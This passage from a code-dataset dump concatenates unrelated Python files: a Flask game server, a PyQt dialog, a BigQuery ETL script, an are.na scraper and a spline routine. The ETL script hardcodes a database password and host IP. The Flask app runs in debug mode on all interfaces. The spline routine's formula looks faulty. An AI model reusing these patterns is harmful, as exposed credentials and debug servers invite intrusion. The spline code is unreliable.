nrows * ncols)\n print(\"Max:\", a.data.max())\n print(\"Min nonzero:\", a.data[a.data > 0.].min())\n print(\"Shape:\", a.shape)\n\n return a\n\n\nif __name__ == '__main__':\n import sys, os\n\n a = matlab2npy(sys.argv[1])\n base = os.path.splitext(sys.argv[1])[0]\n save_npz('{}.npz'.format(base), a)\n","repo_name":"OpenMDAO/OpenMDAO","sub_path":"openmdao/test_suite/matrices/ml2np.py","file_name":"ml2np.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":451,"dataset":"github-code","pt":"53"} +{"seq_id":"38410893365","text":"from flask import Flask, jsonify, render_template\nfrom flask_cors import CORS, cross_origin\nfrom game_state import GameState\nfrom todays_letter_bank import todays_target_sentence_letter_bank, todays_target_sentence\n\napp = Flask(__name__)\nCORS(app)\n# the game state is a singleton\nGS = GameState(_target_sentence=\"the best things in life are free\")\n\n\n@app.route('/_ah/warmup')\ndef warmup():\n return '', 200\n\n\n@app.route('/')\n@cross_origin()\ndef index():\n return render_template('/site/index.html')\n\n\n@app.route('/player_state/', methods=['GET'])\n@cross_origin()\ndef get_player_state(player_id):\n return GS.get_player_state(player_id).to_json()\n\n\n@app.route('/letter_bank', methods=['GET'])\n@cross_origin()\ndef get_todays_target_sentence_letter_bank():\n return jsonify(todays_target_sentence_letter_bank())\n\n\n@app.route('/target_sentence', methods=['GET'])\n@cross_origin()\ndef get_todays_target_sentence():\n return jsonify(todays_target_sentence())\n\n\n@app.route('/submit_guess//', methods=['GET'])\n@cross_origin()\ndef submit_guess(player_id, guess_entry):\n guess_entry = guess_entry.replace(\"+\", \" \")\n print(\"submit_guess: player_id: \" +\n player_id + \" guess_entry: \" + guess_entry)\n guess_score, guess_correct_words, letter_points, p_state, validity_complaint = GS.process_guess(\n player_id, guess_entry)\n return jsonify({\"guess_score\": guess_score, \"guess_correct_words\": guess_correct_words, \"letter_points\": letter_points, \"p_state\": p_state.to_json(), \"validity_complaint\": validity_complaint})\n\n\ndef main(request):\n from flask import request\n\n if request.path.startswith('/'):\n request.path = request.path[1:]\n\n with app.request_context(request.environ):\n try:\n response = app.preprocess_request()\n if response is None:\n response = app.dispatch_request()\n response = app.make_response(response)\n response = app.process_response(response)\n return response\n except Exception as e:\n response = app.handle_exception(e)\n return response\n\n\nif __name__ == '__main__':\n # game_state = GameState(_target_sentence=\"the best things in life are free\")\n ip = '0.0.0.0'\n port = 5000\n # app.run(host=ip, port=port, debug=True)\n app.run(host=ip, port=port, debug=True)\n","repo_name":"OliverBarbeau/sentencer","sub_path":"src/game-server/game_server.py","file_name":"game_server.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33937797275","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\"\"\"\n@Project :deskTip \n@File :AddDialog.py\n@Author :Aidan Lew\n@Date :2022/10/3 21:38 \n\"\"\"\n\nfrom PyQt5.QtWidgets import (\n QDialog,\n QVBoxLayout,\n QLabel,\n QLineEdit,\n QHBoxLayout,\n QPushButton)\n\n\nclass AddDialog(QDialog):\n\n def __init__(self, parent=None):\n super().__init__(parent)\n\n self.setWindowTitle(\"编辑待办事项\")\n\n self.buttonBox = QHBoxLayout()\n button_1 = QPushButton(\"确定\")\n button_1.clicked.connect(self.get_info)\n button_1.clicked.connect(self.accept)\n button_2 = QPushButton(\"取消\")\n button_2.clicked.connect(self.reject)\n self.buttonBox.addWidget(button_1)\n self.buttonBox.addWidget(button_2)\n\n self.layout = QVBoxLayout()\n message = QLabel(\"请填写待办事项:\")\n name_layout = QHBoxLayout()\n name = QLabel(\"事项(请简略):\")\n self.name_info = QLineEdit()\n self.name_info.setObjectName(\"item_name\")\n name_layout.addWidget(name)\n name_layout.addWidget(self.name_info)\n link_layout = QHBoxLayout()\n link = QLabel(\"超链接(可无):\")\n self.link_info = QLineEdit()\n self.link_info.setObjectName(\"link\")\n link_layout.addWidget(link)\n link_layout.addWidget(self.link_info)\n\n self.layout.addWidget(message)\n self.layout.addLayout(name_layout)\n self.layout.addLayout(link_layout)\n self.layout.addLayout(self.buttonBox)\n self.setLayout(self.layout)\n\n self.name_s = None\n self.link_s = None\n\n # 只能在按钮时捕获,不然主窗口获取不到\n def get_info(self):\n self.name_s = self.name_info.text()\n if \"http\" in self.link_info.text() or \"https\" in self.link_info.text():\n self.link_s = self.link_info.text()\n else:\n self.link_s = self.link_info.text().replace(\"\\\\\", \"\\\\\\\\\")\n","repo_name":"AL-377/DeskTip","sub_path":"deskTip/dialogs/AddDialog.py","file_name":"AddDialog.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"9772628711","text":"\"\"\"Modules in the standard library.\"\"\"\nfrom typing import Iterable, List, Tuple\n\n\n# Modules that come with the standard library in Python 2.7\nSTD_LIB_27 = [\n '__builtin__', '__future__', '__main__', '_winreg',\n 'abc', 'aepack', 'aetools', 'aetypes', 'aifc', 'al', 'AL', 'anydbm', 'applesingle', 'argparse', 'array', 'ast', 'asynchat', 'asyncore', 'atexit', 'audioop', 'autoGIL',\n 'base64', 'BaseHTTPServer', 'Bastion', 'bdb', 'binascii', 'binhex', 'bisect', 'bsddb', 'buildtools', 'bz2',\n 'calendar', 'Carbon', 'cd', 'cfmfile', 'cgi', 'CGIHTTPServer', 'cgitb', 'chunk', 'cmath', 'cmd', 'code', 'codecs', 'codeop', 'collections', 'ColorPicker', 'colorsys', 'commands', 'compileall', 'compiler', 'ConfigParser', 'contextlib', 'Cookie', 'cookielib', 'copy', 'copy_reg', 'cPickle', 'cProfile', 'crypt', 'cStringIO', 'csv', 'ctypes', 'curses',\n 'datetime', 'dbhash', 'dbm', 'decimal', 'DEVICE', 'difflib', 'dircache', 'dis', 'distutils', 'dl', 'doctest', 'DocXMLRPCServer', 'dumbdbm', 'dummy_thread', 'dummy_threading',\n 'EasyDialogs', 'email', 'encodings', 'ensurepip', 'errno', 'exceptions',\n 'fcntl', 'filecmp', 'fileinput', 'findertools', 'fl', 'FL', 'flp', 'fm', 'fnmatch', 'formatter', 'fpectl', 'fpformat', 'fractions', 'FrameWork', 'ftplib', 'functools', 'future_builtins',\n 'gc', 'gdbm', 'gensuitemodule', 'getopt', 'getpass', 'gettext', 'gl', 'GL', 'glob', 'grp', 'gzip',\n 'hashlib', 'heapq', 'hmac', 'hotshot', 'htmlentitydefs', 'htmllib', 'HTMLParser', 'httplib',\n 'ic', 'icopen', 'imageop', 'imaplib', 'imgfile', 'imghdr', 'imp', 'importlib', 'imputil', 'inspect', 'io', 'itertools',\n 'jpeg', 'json',\n 'keyword',\n 'lib2to3', 'linecache', 'locale', 'logging',\n 'macerrors', 'MacOS', 'macostools', 'macpath', 'macresource', 'mailbox', 'mailcap', 'marshal', 'math', 'md5', 'mhlib', 'mimetools', 'mimetypes', 'MimeWriter', 'mimify', 'MiniAEFrame', 'mmap', 'modulefinder', 'msilib', 'msvcrt', 'multifile', 'multiprocessing', 'mutex',\n 'Nav', 'netrc', 'new', 'nis', 'nntplib', 'numbers',\n 'operator', 'optparse', 'os', 'ossaudiodev',\n 'parser', 'pdb', 'pickle', 'pickletools', 'pipes', 'PixMapWrapper', 'pkgutil', 'platform', 'plistlib', 'popen2', 'poplib', 'posix', 'posixfile', 'pprint', 'profile', 'pstats', 'pty', 'pwd', 'py_compile', 'pyclbr', 'pydoc',\n 'Queue', 'quopri',\n 'random', 're', 'readline', 'resource', 'rexec', 'rfc822', 'rlcompleter', 'robotparser', 'runpy',\n 'sched', 'ScrolledText', 'select', 'sets', 'sgmllib', 'sha', 'shelve', 'shlex', 'shutil', 'signal', 'SimpleHTTPServer', 'SimpleXMLRPCServer', 'site', 'smtpd', 'smtplib', 'sndhdr', 'socket', 'SocketServer', 'spwd', 'sqlite3', 'ssl', 'stat', 'statvfs', 'string', 'StringIO', 'stringprep', 'struct', 'subprocess', 'sunau', 'sunaudiodev', 'SUNAUDIODEV', 'symbol', 'symtable', 'sys', 'sysconfig', 'syslog',\n 'tabnanny', 'tarfile', 'telnetlib', 'tempfile', 'termios', 'test', 'textwrap', 'thread', 'threading', 'time', 'timeit', 'Tix', 'Tkinter', 'token', 'tokenize', 'trace', 'traceback', 'ttk', 'tty', 'turtle', 'types',\n 'unicodedata', 'unittest', 'urllib', 'urllib2', 'urlparse', 'user', 'UserDict', 'UserList', 'UserString', 'uu', 'uuid',\n 'videoreader',\n 'W', 'warnings', 'wave', 'weakref', 'webbrowser', 'whichdb', 'winsound', 'wsgiref',\n 'xdrlib', 'xml', 'xmlrpclib',\n 'zipfile', 'zipimport', 'zlib'\n]\n\n# New modules introduced in Python 3.5+\nSTD_LIB_35 = [\n '_dummy_thread', '_thread',\n 'asyncio', 'builtins', 'concurrent', 'configparser', 'copyreg', 'enum', 'faulthandler',\n 'html', 'http', 'ipaddress', 'lzma',\n 'pathlib', 'queue', 'reprlib', 'selectors', 'socketserver', 'statistics', 'tkinter', 'tracemalloc', 'turtledemo', 'typing',\n 'venv', 'winreg', 'xmlrpc', 'zipapp'\n]\nSTD_LIB_36 = ['secrets']\nSTD_LIB_37 = ['contextvars', 'dataclasses']\nSTD_LIB_38 = [] # type: ignore\nSTD_LIB_39 = ['graphlib', 'zoneinfo']\nSTD_LIB_310 = [] # type: ignore\n\nSTD_LIB = STD_LIB_27 + STD_LIB_35 + STD_LIB_36 + STD_LIB_37 + STD_LIB_38 + STD_LIB_39 + STD_LIB_310\n\n\ndef separate_third_party_from_std_lib(packages: Iterable[str]) -> Tuple[List[str], List[str]]:\n \"\"\"Separate third-party packages from standard library modules.\n\n Args:\n packages: Package names\n\n Returns:\n Third-party packages, standard library modules\n \"\"\"\n third_party, std_lib = [], []\n for package in packages:\n if package in STD_LIB:\n std_lib.append(package)\n else:\n third_party.append(package)\n return third_party, std_lib\n\n\ndef get_std_lib(version: str) -> List[str]:\n \"\"\"Scrape modules in the standard library for a given Python version.\n\n Args:\n version: Python version\n\n Returns:\n Standard library modules for a given Python version\n \"\"\"\n import requests # type: ignore\n from bs4 import BeautifulSoup # type: ignore\n\n url = f'https://docs.python.org/{version}/py-modindex.html'\n resp = requests.get(url)\n resp.raise_for_status()\n\n soup = BeautifulSoup(resp.text, 'html.parser')\n links = soup.find('table').find_all('a', href=True)\n std_lib = [link.text.split('.')[0] for link in links]\n\n return sorted(set(std_lib))\n\n\nif __name__ == '__main__':\n versions = ['2.7', '3.5', '3.6', '3.7', '3.8', '3.9', '3.10']\n cumulative = []\n for version in versions:\n std_lib = get_std_lib(version)\n print(f'\\nNew additions in {version}')\n print([module for module in std_lib if module not in cumulative])\n cumulative.extend(std_lib)\n","repo_name":"zzhengnan/iscan","sub_path":"iscan/std_lib.py","file_name":"std_lib.py","file_ext":"py","file_size_in_byte":5519,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"25647426990","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[8]:\n\n\n#import libraries\n\nimport psycopg2\nfrom psycopg2 import extras \nimport pandas as pd\nimport os\nimport numpy as np\nfrom datetime import datetime\n\n\nfrom google.cloud import bigquery\nfrom google.oauth2 import service_account\nimport db_dtypes\n\n\n#Connection to cloud BigQuery\ncredentials = service_account.Credentials.from_service_account_file('/home/airflow/gcs/data/GoogleBigQuerykey.json')\nclient = bigquery.Client(credentials=credentials)\n\n#connection to source Postgres DB\nconn = psycopg2.connect(database=\"ufh\",\n user='postgres', password='postgre', \n host='35.196.236.36', port='5432'\n)\n\nconn.autocommit = True\ncursor = conn.cursor()\n\n#default date for initial load\nformat_data = \"%d/%m/%Y %H:%M:%S.%f\"\ntime_data = \"01/01/1900 00:00:0.000\"\ndefault_date = datetime.strptime(time_data,format_data)\n\n# Function to insert log details in Bigquery\n\ndef insertetllog(tablename, etlrowcount, status):\n try:\n #Declare etlid value for log insert\n query_string =\"\"\"SELECT max(etlid) as max_etlid FROM `access-3-352609.UFH_DM.etl_logs` \"\"\"\n max_etlid = client.query(query=query_string).result().to_dataframe()['max_etlid'][0]\n etlid = max_etlid +1\n \n\n # set record attributes\n record = {\"etlid\":etlid,\"tablename\":tablename,\"etlrowcount\": etlrowcount,\n \"etldatetime\":datetime.now(),\"status\":status}\n \n table_ref = client.dataset(\"UFH_DM\").table(\"etl_logs\")\n df_record = pd.DataFrame(record,index=[0])\n client.load_table_from_dataframe(df_record,table_ref)\n\n except Exception as e:\n print(\"Unable to insert record into etl logs\" + print(str(e)))# Function to insert log details in Bigquery\n\n# function to get last eTL for dim_address table\n#default date for initial load\ndef getLastETLforDimAddress(tblname):\n try:\n query = f\"\"\"select max(etldatetime) as max_etldatetime from `access-3-352609.UFH_DM.etl_logs` where tablename = '{tblname}'\"\"\"\n etlrundate = client.query(query).result().to_dataframe()['max_etldatetime'][0]\n return etlrundate\n except Exception as e:\n return default_date\n\n# Function to get delta record to insert for dim_address\n# Function to get record from customer_master from Postgres DB \ndef ExtractDimAddressData():\n lastrundate = getLastETLforDimAddress('dim_address')\n #qry = f'''select * from customer_master where update_timestamp > '{lastrundate}';'''\n datetime_lastrun = datetime.now()\n qry = f'''select * from customer_master where update_timestamp < '{datetime_lastrun}';'''\n df = pd.read_sql_query(qry,conn)\n return df\n\n# ETL operation to generate dim_address data\ndef TransformDimAddressData(dim_aaddress_data):\n dim_address_fields = ['address_id','address','city','state','pincode']\n dim_address = pd.DataFrame(columns=dim_address_fields)\n #dim_aaddress_data = ExtractDimAddressData()\n\n delta_address = pd.DataFrame(columns=dim_address_fields, index = range(1, len(dim_aaddress_data)+1))\n\n #fetch historical dim_address data from Bigquery\n query_string =\"\"\"SELECT * FROM `access-3-352609.UFH_DM.dim_address` ORDER BY address_id DESC\"\"\"\n dim_addres = client.query(query_string).result().to_dataframe()\n\n for i in range(1, len(dim_aaddress_data)):\n delta_address['address_id'][i] = i\n delta_address['address'][i]= dim_aaddress_data['address'][i-1]\n delta_address['city'][i] = dim_aaddress_data['city'][i-1]\n delta_address['state'][i] = dim_aaddress_data['state'][i-1]\n delta_address['state'][i] = dim_aaddress_data['state'][i-1] \n delta_address['pincode'][i] = dim_aaddress_data['pincode'][i-1]\n\n #compare \n inserts = delta_address[~delta_address.apply(tuple,1).isin(dim_addres.apply(tuple,1))]\n return inserts\n\ndef LoadDimAddressData(inserts,tablename):\n lastrundate = datetime.now()\n default_date = datetime.now()\n if (lastrundate== default_date):\n try:\n print('Historical data Loading ')\n #tableRef = client.dataset(\"UFH_DM\").table('dim_address')\n tableRef = client.dataset(\"UFH_DM\").table(tablename)\n bigqueryJob = client.load_table_from_dataframe(inserts, tableRef)\n print('Load Complete')\n except:\n print('Something goes wrong while loading')\n \n# Calling main function \nif __name__ == '__main__':\n required_record = ExtractDimAddressData()\n insert_record = TransformDimAddressData(required_record)\n Loaded_record = LoadDimAddressData(insert_record,'dim_address')\n print('Done')\n","repo_name":"2912rohit1993/Capstone-3-Project","sub_path":"dim_address_script.py","file_name":"dim_address_script.py","file_ext":"py","file_size_in_byte":4663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7725111002","text":"import argparse\nimport csv\nimport os\nimport requests\nimport sqlite3\nimport sys\n\ncsv.field_size_limit(sys.maxsize)\n\n# the attributes to be collected from API call GET /v2/channels\n# https://dev.are.na/documentation/channels#Block43473\nCHANNEL_TARGET_ATTRS = ['id', 'title', 'created_at', 'updated_at', 'published',\n 'open', 'collaboration', 'slug', 'length', 'kind', 'status', 'user_id', \\\n 'follower_count', 'contents', 'collaborators']\n\n# the user attributes to be collected from API call GET /v2/search (returns users)\n# https://dev.are.na/documentation/search#Block59799\nUSER_TARGET_ATTRS = ['id', 'slug', 'username', 'first_name', 'last_name', \\\n 'channel_count', 'following_count', 'profile_id', 'follower_count']\n\nBLOCK_CONN_TARGET_ATTRS = ['block_connections']\n\nCHANNEL_CONN_TARGET_ATTRS = ['channel_connections']\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='are.na data collection')\n parser.add_argument('-channel_csv', help='path to channel csv file to be written to', default='csv/channels.csv')\n parser.add_argument('-user_csv', help='path to user csv file to be written to', default='csv/users.csv')\n parser.add_argument('-block_conn_csv', help='path to block connections csv file to be written to', default='csv/block_connections.csv')\n parser.add_argument('-channel_conn_csv', help='path to channel connections csv file to be written to', default='csv/channel_connections.csv')\n\n parser.add_argument('-channel_table', help='channel table name in database', default='channels')\n parser.add_argument('-user_table', help='user table name in database', default='users')\n parser.add_argument('-connections_table', help='connections table name in database', default='connections')\n\n parser.add_argument('-db', help='path to db file to be written to', default='data.db')\n parser.add_argument('-batch_size', help='batch_size for requests (as large as possible for speed)', default=10000)\n\n return parser.parse_args()\n\n\ndef channel_request_iterator(batch_size):\n \"\"\"\n yields a list of channel json data of length batch_size\n \"\"\"\n\n print('Establishing connection to channels API')\n\n page = 1\n url = 'http://api.are.na/v2/channels'\n\n payload = {'page':page, 'per':batch_size}\n req = requests.get(url, params=payload)\n\n if req.status_code != 200 or len(req.json()['channels']) == 0:\n print('Error establishing API connection. Skipping channel write.')\n\n num_pages = req.json()['total_pages']\n\n while True:\n print('Requesting channels (page %i of %i)' % (page, num_pages))\n\n payload = {'page':page, 'per':batch_size}\n page += 1\n\n req = requests.get(url, params=payload)\n channel_data = req.json()['channels']\n\n if req.status_code != 200 or len(channel_data) == 0:\n break\n\n print('Writing channel data to csv')\n\n for channel in channel_data:\n yield channel\n\n\ndef user_request_iterator(batch_size):\n \"\"\"\n yields a list of user json data of length batch_size\n \"\"\"\n\n print('Establishing connection to search API (to collect users)')\n\n for letter in 'abcdefghijklmnopqrstuvwxyz0123456789':\n page = 1\n print('Fetching users with query \"%s\"' % letter)\n while True:\n url = 'http://api.are.na/v2/search/users/'\n payload = {'q':letter, 'page':page, 'per':batch_size}\n\n\n req = requests.get(url, params=payload)\n\n user_json = req.json()\n user_data = user_json['users']\n num_pages = user_json['total_pages']\n\n if req.status_code != 200 or len(user_data) == 0:\n break\n\n print('Writing user data to csv (page %i of %i)' % (page, num_pages))\n page += 1\n\n for user in user_data:\n yield user\n\n\ndef block_connections_iterator(channels_csv_fp, batch_size):\n\n print(\"Requesting block connections from API\")\n\n with open(channels_csv_fp, mode='r') as f:\n reader = csv.reader(f)\n next(reader)\n\n channel_ids = [int(tuple(line)[0]) for line in reader]\n\n for id in channel_ids[1:]:\n page = 1\n out = [id]\n\n print('Requesting block connections for channel id %i' % id)\n\n while True:\n url = 'http://api.are.na/v2/channels/%s/channels' % id\n payload = {'page':page, 'per':batch_size}\n page += 1\n\n req = requests.get(url, params=payload)\n block_connections = req.json()['channels']\n\n if req.status_code != 200 or len(block_connections) == 0:\n break\n\n out.extend([item['channel']['id'] for item in block_connections])\n\n if len(out) > 1:\n print('Writing block connections to csv')\n yield {'id':id, 'block_connections':out}\n\ndef channel_connections_iterator(channels_csv_fp, batch_size):\n with open(channels_csv_fp, mode='r') as f:\n reader = csv.reader(f)\n next(reader)\n\n channel_ids = [int(tuple(line)[0]) for line in reader]\n\n for id in channel_ids[1:]:\n page = 1\n out = [id]\n\n print('Requesting channel connections for channel id %i' % id)\n\n while True:\n url = 'http://api.are.na/v2/channels/%s/connections' % id\n payload = {'page':page, 'per':batch_size}\n page += 1\n\n req = requests.get(url, params=payload)\n channel_connections = req.json()['channels']\n\n if req.status_code != 200 or len(channel_connections) == 0:\n break\n\n out.extend([item['id'] for item in channel_connections])\n\n if len(out) > 1:\n print('Writing channel connections to csv')\n yield {'id':id, 'channel_connections':out}\n\ndef write_csv_data(csv_path, data_iterator, target_attrs):\n \"\"\"\n Opens file from csv_path, and recieves data from data_iterator,\n extracting attributes in target_attrs from json and writing to .csv\n \"\"\"\n\n if not os.path.isdir(csv_path.split('/')[0]):\n os.makedirs('./csv')\n\n if os.path.exists(csv_path):\n os.remove(csv_path)\n\n f = open(csv_path, 'w+')\n w = csv.writer(f, delimiter=',')\n\n w.writerow(target_attrs)\n\n num_written = 0\n ids = set()\n\n print('Staged to write data to %s' % csv_path)\n\n for d in data_iterator:\n d['id'] = int(d['id']) #TODO: alter data so all ids are already int\n\n if d['id'] in ids:\n continue # if already seen id\n\n ids.add(d['id'])\n\n save_data = [value for (key, value) in d.items() if key in target_attrs]\n\n if len(save_data) == 1: # if from connections TODO: clean up logic\n save_data = save_data[0]\n\n w.writerow(save_data)\n num_written += 1\n\n print('Wrote %i rows to %s' % (num_written, csv_path))\n\n f.close()\n print('Done\\n')\n\ndef write_channel_csv_to_db(csv_fp, db_fp, table_name):\n conn = sqlite3.connect(db_fp)\n c = conn.cursor()\n c.execute('DROP TABLE IF EXISTS %s;' % table_name)\n\n create_table_command = 'CREATE TABLE %s (' % table_name + \\\n 'id int NOT NULL,' + \\\n 'title varchar,' + \\\n 'created_at datetime,' + \\\n 'updated_at datetime,' + \\\n 'published boolean,' + \\\n 'open boolean,' + \\\n 'collaboration boolean,' + \\\n 'slug varchar,' + \\\n 'length int,' + \\\n 'kind varchar,' + \\\n 'status varchar,' + \\\n 'user_id varchar,' + \\\n 'follower_count int,' + \\\n 'contents varchar,' + \\\n 'collaborators varchar' + \\\n ');'\n\n c.execute(create_table_command)\n\n with open(csv_fp) as channels_csv:\n reader = csv.reader(channels_csv)\n channel_data = [tuple(line) for line in reader]\n\n print('Writing %i rows from %s to %s' % (len(channel_data), csv_fp, db_fp+'/'+table_name))\n for channel in channel_data:\n while len(channel) < len(CHANNEL_TARGET_ATTRS): channel += (None,)\n insert_command = 'INSERT INTO %s VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)' % table_name\n c.execute(insert_command, channel)\n\n conn.commit()\n print('Done\\n')\n\ndef write_user_csv_to_db(csv_fp, db_fp, table_name):\n conn = sqlite3.connect(db_fp)\n c = conn.cursor()\n\n c.execute('DROP TABLE IF EXISTS %s;' % table_name)\n\n create_table_command = 'CREATE TABLE %s (' % table_name + \\\n 'id int NOT NULL,' + \\\n 'slug varchar,' + \\\n 'username varchar,' + \\\n 'first_name varchar,' + \\\n 'last_name varchar,' + \\\n 'channel_count int,' + \\\n 'following_count int,' + \\\n 'profile_id int,' + \\\n 'follower_count int' + \\\n ');'\n\n c.execute(create_table_command)\n\n with open(csv_fp, 'r') as f:\n reader = csv.reader(f)\n user_data = [tuple(line) for line in reader]\n\n print('Writing %i rows from %s to %s' % (len(user_data), csv_fp, db_fp+'/'+table_name))\n\n for user in user_data:\n insert_command = 'INSERT INTO %s VALUES (?,?,?,?,?,?,?,?,?)' % table_name\n c.execute(insert_command, user)\n\n conn.commit()\n print('Done\\n')\n\ndef main():\n args = parse_args()\n\n channel_csv_fp = args.channel_csv\n user_csv_fp = args.user_csv\n block_conn_csv_fp = args.block_conn_csv\n channel_conn_csv_fp = args.channel_conn_csv\n\n db_fp = args.db\n channel_table_name = args.channel_table\n user_table_name = args.user_table\n batch_size = args.batch_size\n\n channel_iterator = channel_request_iterator(batch_size)\n write_csv_data(channel_csv_fp, channel_iterator, CHANNEL_TARGET_ATTRS)\n write_channel_csv_to_db(channel_csv_fp, db_fp, channel_table_name)\n\n user_iterator = user_request_iterator(batch_size)\n write_csv_data(user_csv_fp, user_iterator, USER_TARGET_ATTRS)\n write_user_csv_to_db(user_csv_fp, db_fp, user_table_name)\n\n block_conn_iterator = block_connections_iterator(channel_csv_fp, batch_size)\n write_csv_data(block_conn_csv_fp, block_conn_iterator, BLOCK_CONN_TARGET_ATTRS)\n\n channel_conn_iterator = channel_connections_iterator(channel_csv_fp, batch_size)\n write_csv_data(channel_conn_csv_fp, channel_conn_iterator, CHANNEL_CONN_TARGET_ATTRS)\n\nif __name__ == '__main__':\n main()\n","repo_name":"cs1951a-s20-brown/cs1951a-s20-brown.github.io","sub_path":"projects/project_data/scra.per/collect_data.py","file_name":"collect_data.py","file_ext":"py","file_size_in_byte":11054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36371598985","text":"import os, sys\nfrom xdg import xdg_data_home, xdg_config_home\n\n## Genral Information\ninfo = {\n\t\"NAME\": \"ColorApp\",\n\t\"VERSION\": \"0.2.0\",\n\t\"AUTHOR\": \"Fr75s\",\n\t\"URL\": \"\"\n}\n\npaths = {\n\t\"DATA\": os.path.join(xdg_data_home(), \"colorapp/\"),\n\t\"CONF\": os.path.join(xdg_config_home(), \"colorapp/\")\n}\n\nversion_info = info[\"NAME\"] + \" v\" + info[\"VERSION\"] + \". Made by \" + info[\"AUTHOR\"]\n\ncolors = {\n\t\"main\": \"#26282d\",\n\t\"side\": \"#1e2126\",\n\t\"tool\": \"#16171a\",\n\t\"text\": \"#f2f6ff\"\n}\n\noptions = {\n\t\"simpledisp\": False,\n\t\"altcolschemegen\": False\n}\n","repo_name":"Fr75s/colorapp","sub_path":"colorapp/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37183029413","text":"\"\"\"Command-line interface - run command.\n\nAttributes:\n cmd_help (str): The help string to use for this command.\n cmd_short_help (str): The short help to use for this command. This is shown on the\n command listing of the parent command.\n\n\"\"\"\nfrom typing import Dict, Any\nfrom subprocess import CalledProcessError\n\nimport click\nfrom fastapi_mvc.cli import ClickAliasedCommand\nfrom fastapi_mvc.utils import run_shell, get_poetry_path, require_fastapi_mvc_project\n\n\ncmd_short_help = \"Run development uvicorn server.\"\ncmd_help = \"\"\"\\\nThe 'fastapi-mvc run' commands runs development uvicorn server for a\nfastapi-mvc project at the current working directory.\n\"\"\"\n\n\n@click.command(\n cls=ClickAliasedCommand,\n help=cmd_help,\n short_help=cmd_short_help,\n alias=\"r\",\n)\n@click.option(\n \"--host\",\n help=\"Host to bind.\",\n type=click.STRING,\n default=\"127.0.0.1\",\n required=False,\n show_default=True,\n)\n@click.option(\n \"-p\",\n \"--port\",\n help=\"Port to bind.\",\n type=click.STRING,\n default=\"8000\",\n required=False,\n show_default=True,\n)\n@click.option(\n \"-i\",\n \"--install\",\n help=\"Run poetry install.\",\n is_flag=True,\n)\n@click.pass_context\ndef run(ctx: click.Context, **options: Dict[str, Any]) -> None:\n \"\"\"Define command-line interface run command.\n\n Args:\n ctx (click.Context): Click Context class object instance.\n options (typing.Dict[str, typing.Any]): Map of command option names to their\n parsed values.\n\n \"\"\"\n project_data = require_fastapi_mvc_project()\n poetry_path = get_poetry_path()\n\n if options[\"install\"]:\n run_shell(\n cmd=[\n poetry_path,\n \"install\",\n \"--no-interaction\",\n ],\n check=True,\n )\n\n try:\n run_shell(\n cmd=[\n poetry_path,\n \"run\",\n \"uvicorn\",\n \"--factory\",\n \"--host\",\n f\"{options['host']}\",\n \"--port\",\n f\"{options['port']}\",\n \"--reload\",\n f\"{project_data['package_name']}.app:get_application\",\n ],\n check=True,\n )\n except CalledProcessError:\n click.secho(\"Run 'make install` to install the project.\", fg=\"yellow\")\n ctx.exit(1)\n","repo_name":"fastapi-mvc/fastapi-mvc","sub_path":"fastapi_mvc/cli/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","stars":495,"dataset":"github-code","pt":"53"} +{"seq_id":"15053488763","text":"from load_profile import load_foil\n\n#list of data point (e for extardos and i for intrados)\n(dim,ex,ey,ix,iy) = load_foil(\"c5a.dat\")\n\n\ndef spline(x,y):\n n = len(x)\n y2 = [0]\n u = [0]\n for i in range(1,n-1):\n sig = (x[i]-x[i-1])/(x[i+1]-x[i-1])\n p = sig * y2[i-1] + 2.\n y2.append((sig - 1.) / p)\n u.append((6. * ((y[i+1]-y[i])/(x[i+1]-x[i]) - (y[i]-y[i-1])/(x[i]-x[i-1])) / (x[i+1]-x[i-1]) - sig*u[i-1])/p)\n y2.append(1)\n for i in range(n-2,0,-1):\n y2[i]=y2[i] * y2[i+1] + u[i]\n return y2\n\ndef splint(X,Y,x,y2):\n n = len(X)\n kmin = 0\n kmax = n - 1\n while(kmax - kmin > 1):\n k= (kmax+kmin)//2\n if(X[k] > x):\n kmax = k\n else :\n kmin = k\n h = (X[kmin] - X[kmax])\n if (h == 0):\n print(\"erreur in X list\")\n a = (X[kmax] - x) /h\n b = (x - X[kmin]) /h\n y = a*Y[kmin] + b*Y[kmax] + ((a**3 - a) * y2[kmax] + (b**3 - b) * y2[kmax])*(h**2)/6.\n return y\n\n\ny2intra = spline(ix,iy)\ny2extra = spline(ex,ey)\n\ndef intrados(x):\n return splint(ix,iy,x,y2intra)\n\ndef extrados(x):\n return splint(ex,ey,x,y2extra)\n\n","repo_name":"maelle101/Algonum5","sub_path":"interpolation.py","file_name":"interpolation.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32027117115","text":"from Models import Actor, Critic\n\nimport numpy as np\nimport random\nimport copy\nfrom collections import namedtuple, deque\n\nimport torch\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nBUFFER_SIZE = int(1e6)\nBATCH_SIZE= 64\nGAMMA = 0.99 \nTAU = 1e-3 \nLR_ACTOR = 0.001 \nLR_CRITIC = 0.003 \nWEIGHT_DECAY = 0.0001 \n\nclass Agent():\n\n def __init__(self, s_size, a_size, seed, device):\n\n self.s_size = s_size\n self.a_size = a_size\n self.seed = seed\n self.device = device\n\n self.actor_local = Actor(s_size, a_size, seed).to(self.device)\n self.actor_target = Actor(s_size, a_size, seed).to(self.device)\n self.actor_optim = optim.Adam(self.actor_local.parameters(), 